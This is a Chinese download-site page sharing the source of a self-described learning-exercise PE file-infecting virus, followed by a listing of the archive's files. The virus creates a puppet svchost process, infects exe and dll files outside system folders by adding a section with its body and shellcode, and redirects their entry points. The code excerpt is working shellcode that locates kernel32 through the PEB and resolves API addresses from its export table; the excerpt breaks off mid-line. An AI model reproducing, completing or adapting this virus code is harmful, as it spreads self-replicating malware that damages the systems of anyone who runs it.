資源簡介
眾所周知,感染型病毒是通過感染計算機PE文件,來復制傳播。病毒與PE文件同穿一條褲子,偷偷寄存在人家后院,盡干“不見得人”的事。
搜一下硬盤發現曾寫過一個練過手,雖然寫得不盡完美,但感染性還是有的,分享下,初學者能有一個直觀印象,大鳥請拍磚。
病毒的目的創建svchost傀儡進程,感染計算機下所有非系統文件夾下的exe,dll文件,在被感染文件下添加一個節,把母體和shellcode寫進去,修改入口。下次被感染母體運行時,釋放病毒母體并運行,重復過程繼續感染。
代碼片段和文件信息
/*?************************************
*?
*?功能?添加到PE文件的執行代碼
*?
**************************************/
#include?
#include?
#include?“DataStruct.h“
#pragma?comment(linker“/merge:.data=.text“)
#pragma?comment(linker?“/SECTION:.textREW“)
DWORD?Matrix_size=0x600;
DWORD?Matrix_start=0x401320;//假設母體重定位置
DWORD?OrigEntyPoint=0xF1F1F1F2;//原來的EntryPoint
DWORD?g_kernel32=0xF1F1F1F3;
char?szKernel32[]=“Kernel32.dll“;
char?szOpenMutexA[]=“OpenMutexA“;
char?szReleaseMutex[]=“ReleaseMutex“;
char?szCreateFileA[]=“CreateFileA“;
char?szWriteFile[]=“WriteFile“;
char?szCloseHandle[]=“CloseHandle“;
char?szCreateProcessA[]=“CreateProcessA“;
char?szMutexName[]=“MY_SYSTEM_DEMETRA_MAIN“;
char?szGetModuleFileNameA[]=“GetModuleFileNameA“;
char?szLoad[13]=“LoadLibraryA“;
char?szGetpro[15]=“GetProcAddress“;
char?szCurrentModuleName[MAX_PATH]=“ABCDEFGHIJKLMNOP“;
__declspec(naked)
void
getKernel32(){
__asm{
mov?eaxfs:[0x30]
mov?eax[eax+0xc]
mov?esi[eax+0x1c]
lods?dword?ptr?ds:[esi]
mov?eax[eax+0x8]
mov?g_kernel32eax
ret
}
}
/*?************************************
*?
*ShellCode需要重定位,不宜有太多分支。簡單容易提取
*?
**************************************/
void?ShellCode(){
_OPENMUTEX?MyOpenMutex;
_RELEASEMUTEX?MyReleaseMutex;
_CREATEFILE?MyCreateFile;
_WRITEFILE?MyWriteFile;
_CREATEPROCESS?MyCreateProcess;
_CLOSEHANDLE?MyCloseHandle;
_GETMODULEFILENAME?MyGetModuleFileName;
_LOADLIBRARYA?MyLoadLibraryA=NULL;
_GETPROCADDRESS?MyGetProcAddress=NULL;
HMODULE?hKernel32;
PIMAGE_EXPORT_DIRECTORY?pImage_export_directory;
DWORD?PE_RVA;
int?NumberOfFunctions=0;
DWORD?AddressOfNames;
getKernel32();
PE_RVA=*((DWORD*)(g_kernel32+0x3c));
pImage_export_directory=(PIMAGE_EXPORT_DIRECTORY)((*((DWORD*)(g_kernel32+PE_RVA+0x78)))+g_kernel32);//得到輸出表VA
NumberOfFunctions=pImage_export_directory->NumberOfFunctions;//導出個數
AddressOfNames=pImage_export_directory->AddressOfNames+g_kernel32;//名字地址VA
/*得到LoadLibraryA和GetProcAddress的地址*/
for?(int?i=0;i
char*?szFunName=(char*)(*((DWORD*)(AddressOfNames+i*4))+g_kernel32);//指向導出函數名字地址
char*?szSrcString=szLoad;?
for(;*szSrcString==*szFunName?&&?*szSrcString!=0;++szSrcString++szFunName);
if?(!(*szFunName-*szSrcString))//是否相等
{
MyLoadLibraryA=(_LOADLIBRARYA)(*(((DWORD*)(pImage_export_directory->AddressOfFunctions+g_kernel32))+i)+g_kernel32);//得到地址
}
szFunName=(char*)(*((DWORD*)(AddressOfNames+i*4))+g_kernel32);//指向導出函數名字地址
szSrcString=szGetpro;?
for(;*szSrcString==*szFunName?&&?*szSrcString!=0;++szSrcString++szFunName);
if?(!(*szFunName-*szSrcString))//是否相等
{
MyGetProcAddress=(_GETPROCADDRESS)(*(((DWORD*)(pImage_export_directory->AddressOfFunctions+g_kernel32))+i)+g_kernel32);//得到地址
}
}
hKernel32=MyLoadLibraryA(szKernel32);
MyOpenMutex=(_OPENMUTEX)MyGetProcAddress(hKernel32szOpenMutexA);
MyReleaseMutex=(_RELEASEMUTEX)MyGetProcAddress(hKernel32szReleas ?屬性????????????大小?????日期????時間???名稱
-----------?---------??----------?-----??----
?????目錄???????????0??2014-03-21?00:09??完成v1.2\
?????目錄???????????0??2014-03-21?00:09??完成v1.2\bin\
?????文件???????45056??2013-05-11?22:16??完成v1.2\bin\完成v1.2.v
?????目錄???????????0??2014-03-20?22:39??完成v1.2\源碼v1.2\
?????目錄???????????0??2014-03-13?11:23??完成v1.2\源碼v1.2\ShellcodeTest\
?????文件????????2216??2013-05-03?15:06??完成v1.2\源碼v1.2\ShellcodeTest\DataStruct.h
?????文件????????4734??2013-05-11?21:58??完成v1.2\源碼v1.2\ShellcodeTest\ShellCodeTest.cpp
?????文件????????4050??2013-05-03?20:42??完成v1.2\源碼v1.2\ShellcodeTest\ShellcodeTest.vcxproj
?????文件????????1074??2013-05-02?20:14??完成v1.2\源碼v1.2\ShellcodeTest\ShellcodeTest.vcxproj.filters
?????文件?????????143??2013-05-02?17:31??完成v1.2\源碼v1.2\ShellcodeTest\ShellcodeTest.vcxproj.user
?????文件????????1536??2013-05-05?23:16??完成v1.2\源碼v1.2\ShellcodeTest\ShellcodeTestSrv.exe
?????文件????????1856??2013-05-11?22:09??完成v1.2\源碼v1.2\Test.sln
?????文件???????46080??2013-10-28?09:15??完成v1.2\源碼v1.2\Test.suo
?????目錄???????????0??2014-03-13?11:23??完成v1.2\源碼v1.2\注入代碼\
?????文件????????5690??2013-05-10?17:43??完成v1.2\源碼v1.2\注入代碼\DataStruct.h
?????文件???????27857??2013-10-25?11:52??完成v1.2\源碼v1.2\注入代碼\Inject.cpp
?????文件????????1056??2013-05-05?18:23??完成v1.2\源碼v1.2\注入代碼\Shellcod_00401000.mem
?????文件???????17824??2013-05-04?16:29??完成v1.2\源碼v1.2\注入代碼\注入代碼.aps
?????文件????????4140??2013-05-11?18:17??完成v1.2\源碼v1.2\注入代碼\注入代碼.vcxproj
?????文件????????1067??2013-05-05?18:38??完成v1.2\源碼v1.2\注入代碼\注入代碼.vcxproj.filters
?????文件?????????143??2013-04-28?09:52??完成v1.2\源碼v1.2\注入代碼\注入代碼.vcxproj.user
?????文件???????34576??2013-05-04?16:29??完成v1.2\源碼v1.2\注入代碼\注入代碼1.aps
?????目錄???????????0??2014-03-13?11:23??完成v1.2\源碼v1.2\測試目標\
?????文件?????????208??2013-05-07?15:30??完成v1.2\源碼v1.2\測試目標\DataStruct.h
?????文件?????????674??2013-05-07?17:07??完成v1.2\源碼v1.2\測試目標\ImportFuncStruct.h
?????文件????????1735??2013-05-08?17:45??完成v1.2\源碼v1.2\測試目標\MyFunction.h
?????文件?????????896??2013-05-07?14:21??完成v1.2\源碼v1.2\測試目標\resource.h
?????文件????????8474??2013-05-11?22:05??完成v1.2\源碼v1.2\測試目標\Target.cpp
?????文件????????6464??2013-05-07?20:43??完成v1.2\源碼v1.2\測試目標\合成第四版(第四個版備份).mem
?????文件????????8288??2013-05-11?20:45??完成v1.2\源碼v1.2\測試目標\合成第四版.mem
?????文件???????40224??2013-05-07?14:21??完成v1.2\源碼v1.2\測試目標\測試目標.aps
............此處省略5個文件信息
- 上一篇:libcurl相關資源
- 下一篇:標準大氣參數計算程序
評論
共有 條評論
川公網安備 51152502000135號